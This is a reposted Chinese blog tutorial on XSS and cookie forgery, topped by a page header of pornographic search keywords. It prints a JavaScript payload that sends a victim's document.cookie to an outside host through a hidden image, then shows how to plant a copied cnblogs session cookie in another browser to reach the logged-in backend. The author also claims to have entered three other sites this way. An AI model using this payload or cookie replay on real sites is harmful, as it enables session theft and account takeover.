日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

COOKIE伪造登录网站后台

發布時間:2023/11/30 编程问答 30 豆豆
生活随笔 收集整理的這篇文章主要介紹了 COOKIE伪造登录网站后台 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

1.關于XSS(跨站腳本攻擊)和CSRF(跨站請求偽造)的知識,xss表示Cross Site Scripting(跨站腳本攻擊),它與SQL注入攻擊類似,SQL注入攻擊中以SQL語句作為用戶輸入,從而達到查詢/修改/刪除數據的目的,而在xss攻擊中,通過插入惡意腳本,實現對用戶游覽器的控制,CSRF全名是Cross-site request forgery,是一種對網站的惡意利用,CSRF比XSS更具危險性。其實XSS攻擊就是網站輸入框沒有限制非法字符,或者沒有對腳本內容進行編碼導致的!

?

var img = document.createElement('img'); img.src='http://www.xss.com?cookie='+document.cookie; img.style.display='none'; document.getElementsByTagName('body')[0].appendChild(img);

?

比如這段代碼,當我們沒有對網站輸入框進行非法字符的限制的話,用戶輸入了這段腳本,這樣就會神不知鬼不覺的把當前用戶的cookie發送給了我的惡意站點,我的惡意站點通過獲取get參數就拿到了用戶的cookie。當然我們可以通過這個方法拿到用戶各種各樣的數據。

?

?

2.當然我今天說的主要不是這些,而是通過你拿到的cookie,植入到你的瀏覽器中然后就可以訪問網站后臺了,下面我來為大家演示一遍,如何通過已存在的Cookie,進入博客園后臺,我用IE瀏覽器和Chrome瀏覽器來測試!

首先我們通過IE瀏覽器拿到我們登入博客園后的Cookie,通過IECookiesview插件可以查看到IE瀏覽器下所有的Cookie信息,然后我們找到cnblogs.com站點下的Cookie,然后復制下.CNBlogsCookie和key和value值,如圖所示!?

?

3.眾所周知,cookies屬于隱私數據,不同瀏覽器保存在不同地方。不可能共享的,此時我們再次打開Chorme瀏覽器,如圖IE瀏覽器為登錄狀態,而chorme瀏覽器為未登錄狀態

?

?

4.那么此時我們就將剛拷貝的IE瀏覽器下博客園的cookie數據植入到chrome瀏覽器中,實現cookie欺騙登錄到博客園后臺,在chrome瀏覽器中添加cookies擴展程序,方便寫入和刪除cookie

?

?

5.然后打開cookies插件,我們就找到cnblogs.com下的cookie,默認沒有登錄的時候是沒有.CNBlogsCookie這個cookie的,?然后我們點擊添加一個cookie,將.CNBlogsCookie和key和value值寫入進去,再刷新網站頁面,成功進入博客園網站后臺! ?

?

?

6.如果將這個方法,再結合到開始講的XSS攻擊的話獲取到別人網站的cookie信息,那么黑進別人網站的后臺就很容易了,我自己也試了三個網站,都是可以成功進入的! 當然我說這些不是為了讓大家黑別人的網站,只是只有弄懂了這些,才能更好的防范,保證自己開發的網站的安全!?

轉載于:https://www.cnblogs.com/zhang0807/p/10275359.html

創作挑戰賽新人創作獎勵來咯,堅持創作打卡瓜分現金大獎

總結

以上是生活随笔為你收集整理的COOKIE伪造登录网站后台的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。